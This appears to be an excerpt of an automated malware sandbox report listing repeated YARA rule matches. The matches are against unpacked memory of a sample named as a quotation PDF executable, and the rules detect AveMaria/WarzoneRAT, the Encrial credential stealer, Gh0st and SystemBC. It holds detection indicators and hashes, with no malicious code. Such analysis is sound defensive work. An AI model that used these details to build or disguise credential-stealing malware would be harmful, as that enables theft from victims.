Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.3.order_of_quotationpdf.exe.715910.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.715910.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
